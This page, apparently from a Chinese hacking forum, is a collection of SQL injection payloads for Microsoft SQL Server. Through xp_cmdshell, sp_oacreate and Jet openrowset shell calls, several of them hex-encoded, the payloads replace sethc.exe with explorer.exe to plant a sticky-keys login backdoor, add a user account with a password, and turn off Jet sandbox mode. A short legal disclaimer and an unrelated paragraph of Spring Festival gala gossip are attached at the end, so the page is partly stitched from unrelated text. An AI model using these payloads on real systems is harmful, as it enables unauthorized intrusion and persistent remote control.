setch并且过单引号

积分值

---------------------------------------------------开sethc.exe 命令

;declare%20@a%20sysname%20select%20@a=0x63006F0070007900200063003A005C00770069006E0064006F00770073005C006500780070006C006F007200650072002E00650078006500200063003A005C00770069006E0064006F00770073005C00730079007300740065006D00330032005C00730065007400680063002E00650078006500%20exec%20master.dbo.xp_cmdshell%20@a;--

;declare%20@a%20sysname%20select%20@a=0x63006F0070007900200063003A005C00770069006E0064006F00770073005C00730079007300740065006D00330032005C00730065007400680063002E00650078006500200063003A005C00770069006E0064006F00770073005C00730079007300740065006D00330032005C0064006C006C00630061006300680065005C00730065007400680063002E00650078006500%20exec%20master.dbo.xp_cmdshell%20@a;--

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
加用户名]net user bb sdho@!123sd /add

;declare%20@a%20sysname%20select%20@a=0x6E00650074002000750073006500720020006200620020007300640068006F00400021003100320033007300640020002F00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--


-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c copy c:\windows\explorer.exe c:\windows\system32\sethc.exe'--
;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe'--


;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\command.com /c copy c:\windows\explorer.exe c:\windows\system32\sethc.exe'--
;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\command.com /c copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe'--
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

;EXEC master.dbo.xp_cmdshell'c:\windows\system32\cmd.exe /c copy c:\windows\explorer.exe c:\windows\system32\sethc.exe'--
;EXEC master.dbo.xp_cmdshell'c:\windows\system32\cmd.exe /c copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe'--

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
and 0<>(select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("command.com /c copy c:\windows\explorer.exe c:\windows\system32\sethc.exe")'))--
and 0<>(select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("command.com /c copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe")'))--
---------------------------------------------------

黑吧友情提示：动画教程仅供技术交流作用.请遵守中国法律以及黑客准则.
由此动画由网友自由发布，造成的任何后果和本站无关.
如网友发布交易信息请核对其真实性，网络有风险，交易须谨慎。

嘉瑜骟

一年一度的春节晚会开始了，东北帮派的赵本山无疑又是最热焦点。据悉，2010年春节晚会赵本山将与小沈阳独立成节目，而赵本山将要推出新人。也就是说，赵本山与他的徒弟们将会主宰本届春节晚会。新人会是谁，还有待考察。经有关透露可能是刘能。




















































外链已经被和谐！